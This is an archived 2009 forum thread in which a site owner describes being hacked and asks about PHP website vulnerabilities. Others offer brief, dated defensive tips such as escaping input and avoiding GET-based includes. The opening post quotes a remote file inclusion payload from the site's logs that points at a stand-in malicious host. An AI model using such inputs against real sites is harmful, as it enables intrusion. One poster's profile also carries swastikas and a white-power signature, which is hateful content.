Zoklet.net

Go Back   Zoklet.net > Technology > Technophiles and Technophiliacs > Codes of all kinds

Reply
 
Thread Tools
  #1  
Old 06-24-2009, 11:49 AM
TwinkleTits TwinkleTits is offline
Member
 
Join Date: Jan 2009
Thanks: 114
Thanked 15 Times in 15 Posts
Default Website Vulnerabilities

The only vulnerability I know of is not filtering input fields which makes your site prone to cross site scripting. My site got hacked last year by some Brazilians then some weird shit happened I got an email from a Brazilian guy telling me that hackers were using my site to send spam and somehow he managed to edit my PHP files and he patched up the vulnerabilities but adding the htmlelements command to all the input fields. How the hell did he edit the PHP files? He woulda had to either have the FTP username and password or control panel username and pass and either way I dunno how the hell he managed to get that info.

What are other things to take into consideration when hosting a website? I spotted that people were messing with the URL variables for example my website has pages like ?get=drugs which tells the index.php to include drugs.php. I checked the logs and people were typing in stuff like ?get=http://www.suspicioussite/suspiciousfile.txt. Obviously they were trying to get my site to run these malicious text files. Is that considered cross site scripting too?

In fact my log files were packed full of weird shit that people were doing half of it I didn't understand at all.
Reply With Quote
  #2  
Old 06-24-2009, 11:53 AM
crimsonsmoke's Avatar
crimsonsmoke crimsonsmoke is offline
Baron
 
Join Date: Jan 2009
Location: Brighton, UK
Thanks: 103
Thanked 154 Times in 108 Posts
Default Re: Website Vulnerabilities

Sorry, I don't have any of the answers to your question, but I'd just like to say you have a fantastic name.
__________________
All our knowledge begins with the senses, proceeds then to the understanding, and ends with reason. There is nothing higher than reason -- Immanuel Kant
Reply With Quote
  #3  
Old 06-24-2009, 11:59 AM
bornkiller bornkiller is offline
Count
 
Join Date: Jan 2009
Location: NZ-North
Thanks: 717
Thanked 463 Times in 325 Posts
Default Re: Website Vulnerabilities

Quote:
Originally Posted by crimsonsmoke View Post
Sorry, I don't have any of the answers to your question, but I'd just like to say you have a fantastic name.
Yep! I can agree with this this also....brilliant user name
__________________
we still exist, therefore totse isn't dead, only evolved
Reply With Quote
  #4  
Old 06-24-2009, 12:29 PM
TwinkleTits TwinkleTits is offline
Member
 
Join Date: Jan 2009
Thanks: 114
Thanked 15 Times in 15 Posts
Default Re: Website Vulnerabilities

Quote:
Originally Posted by crimsonsmoke View Post
Sorry, I don't have any of the answers to your question, but I'd just like to say you have a fantastic name.
Thanks. Its quite elegant isn't it. I got it off one of those fat-pie cartoons. http://www.fat-pie.com/twinkletits.htm He has some imagination that David Firth lad. I wonder if hes on acid or shrooms when he comes up with those cartoons.
Reply With Quote
  #5  
Old 06-24-2009, 12:33 PM
5024L 5024L is offline
Archduke
 
Join Date: Feb 2009
Location: 卐 FUCK YOU 卐
Thanks: 242
Thanked 507 Times in 345 Posts
Send a message via MSN to 5024L
Default Re: Website Vulnerabilities

You should have posted in NS&H, you probably would have got a better answer.
__________________
W.P.B.G.
White Power Blood King
RIP UNCLE GREYFOX
Reply With Quote
  #6  
Old 06-24-2009, 12:45 PM
crimsonsmoke's Avatar
crimsonsmoke crimsonsmoke is offline
Baron
 
Join Date: Jan 2009
Location: Brighton, UK
Thanks: 103
Thanked 154 Times in 108 Posts
Thumbs Up Re: Website Vulnerabilities

Quote:
Originally Posted by TwinkleTits View Post
Thanks. Its quite elegant isn't it. I got it off one of those fat-pie cartoons. http://www.fat-pie.com/twinkletits.htm He has some imagination that David Firth lad. I wonder if hes on acid or shrooms when he comes up with those cartoons.
Yeah, I know Fat[dash]Pie. Devvo's fucking brilliant too .

Crazy northan bastard.
__________________
All our knowledge begins with the senses, proceeds then to the understanding, and ends with reason. There is nothing higher than reason -- Immanuel Kant
Reply With Quote
  #7  
Old 06-24-2009, 11:22 PM
Axiom Axiom is offline
Duke
 
Join Date: May 2008
Thanks: 21
Thanked 53 Times in 42 Posts
Default Re: Website Vulnerabilities

Two of the simplest things you can do to avoid hackers.

1) Any data going in wrap in mysql_real_escape_string()
2) Any data going out wrap in htmlentities()

Also, turn off MySQL warnings and avoid including files based on GET variables. It just encourages the hacker to look for XSS...
Reply With Quote
  #8  
Old 06-24-2009, 11:35 PM
deus deus is offline
Duke
 
Join Date: Jan 2009
Location: Leeds, UK
Thanks: 145
Thanked 132 Times in 68 Posts
Send a message via MSN to deus
Thumbs Up Re: Website Vulnerabilities

Oh man, I could write an absolute novel on this

Post reserved to remind me in the morning when I can fathom a sentence.
Reply With Quote
Reply

Bookmarks

Tags
vulnerabilities, website

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Zok knows how to run a website. driveby Generally Speaking 39 04-03-2009 02:11 AM
Captcha Vulnerabilities McSpanky Technophiles and Technophiliacs 6 03-24-2009 02:56 PM
This website is going to die. Herpy Derpy Generally Speaking 1 01-17-2009 10:56 PM


All times are GMT. The time now is 08:28 PM.


Hot Topics
On IRC
Users: 4
Messages/minute: 0
Topic: "http://www.zoklet.net/..."
Users: 22
Messages/minute: 0
Topic: "buttpee"
Users: 10
Messages/minute: 0
Topic: "11:37 < mib_i8mfin> so wie ich die website hier sehe las..."
Advertisements
Your ad could go right HERE! Contact us!

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.